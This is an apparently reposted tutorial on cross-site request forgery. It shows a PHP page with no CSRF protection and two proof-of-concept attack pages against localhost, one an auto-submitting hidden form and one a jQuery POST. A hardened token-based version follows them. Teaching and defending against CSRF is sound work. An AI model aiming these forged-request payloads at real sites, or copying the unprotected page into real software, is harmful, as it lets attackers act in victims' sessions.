A POST CSRF example

Server side

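<?php
// No CSRF token or origin check: this is the page the PoCs below target.
$conn = mysqli_connect('localhost', 'root', 'root', 'csrf');
if (!empty($_POST)) {
    // Read the fields only when a form was posted (avoids undefined-index notices on GET).
    $user = $_POST['username'] ?? '';
    $pass = $_POST['password'] ?? '';
    // Prepared statement so the posted values are not concatenated into the SQL.
    $stmt = mysqli_prepare($conn, "insert into user(`username`,`password`) values (?, ?)");
    mysqli_stmt_bind_param($stmt, 'ss', $user, $pass);
    mysqli_stmt_execute($stmt);
}
?>

<form action="" method="POST">
    1<input type="text" name="username"/>
    2<input type="text" name="password"/>
    <button>提交</button>
</form>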

POC

<form action="http://localhost/csrf/csrf.php" method="POST" id="testfrom">
    <input type="hidden" name="username"/>
    <input type="hidden" name="password"/>

</form>

<script>
    var f=document.getElementById("testfrom");
    f.getElementsByTagName("input")[0].value="csrf12";
    f.getElementsByTagName("input")[1].value="csrf23";
    f.submit();

</script>

jQuery POST CSRF

<script src="https://apps.bdimg.com/libs/jquery/2.1.4/jquery.min.js"></script>
<script>
    $(document).ready(function(){
        $.post("http://localhost/csrf/csrf.php", {
                username: 'test123123',
                password: 'csrf666'
            },
            function(data, status){
                alert(status);
            }
        );
    });
</script>
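
Both PoCs work because nothing in the request proves it came from the server's own form. A hardened version of the server page, as an added example (not the original post's code): it ties a random per-session token to the form, rejects any POST without it, and marks the session cookie SameSite=Strict. It assumes PHP 7.3+, the page's `csrf` database and `user` table, and a `password` column wide enough for a hash; `csrf_token` is a name chosen here.

```php
<?php
// Added example (not the original post's code): csrf.php with a synchronizer token.
// SameSite=Strict: the browser omits the session cookie on cross-site form posts.
session_set_cookie_params(['httponly' => true, 'samesite' => 'Strict']);
session_start();

// One random token per session; "csrf_token" is a name chosen for this example.
if (empty($_SESSION['csrf_token'])) {
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}

$message = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $sent = $_POST['csrf_token'] ?? '';
    // Constant-time comparison; a missing, non-string or wrong token is rejected.
    if (!is_string($sent) || !hash_equals($_SESSION['csrf_token'], $sent)) {
        http_response_code(403);
        exit('CSRF token mismatch');
    }
    $user = $_POST['username'] ?? '';
    $pass = $_POST['password'] ?? '';
    if (is_string($user) && is_string($pass) && $user !== '' && $pass !== '') {
        $conn = mysqli_connect('localhost', 'root', 'root', 'csrf');
        // Assumption: the password column is wide enough (255 chars) for a hash.
        $hash = password_hash($pass, PASSWORD_DEFAULT);
        // Prepared statement: posted values never become part of the SQL text.
        $stmt = mysqli_prepare($conn, 'INSERT INTO user (`username`, `password`) VALUES (?, ?)');
        mysqli_stmt_bind_param($stmt, 'ss', $user, $hash);
        mysqli_stmt_execute($stmt);
        $message = 'Saved';
    }
}
?>

<?= htmlspecialchars($message, ENT_QUOTES) ?>
<form action="" method="POST">
    <input type="hidden" name="csrf_token" value="<?= htmlspecialchars($_SESSION['csrf_token'], ENT_QUOTES) ?>"/>
    1<input type="text" name="username"/>
    2<input type="text" name="password"/>
    <button>Submit</button>
</form>
```

Against this page both PoCs above get a 403: neither the hidden form nor the `$.post` call can read the token that the server placed in its own form.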


Reposted from www.cnblogs.com/M0rta1s/p/11920880.html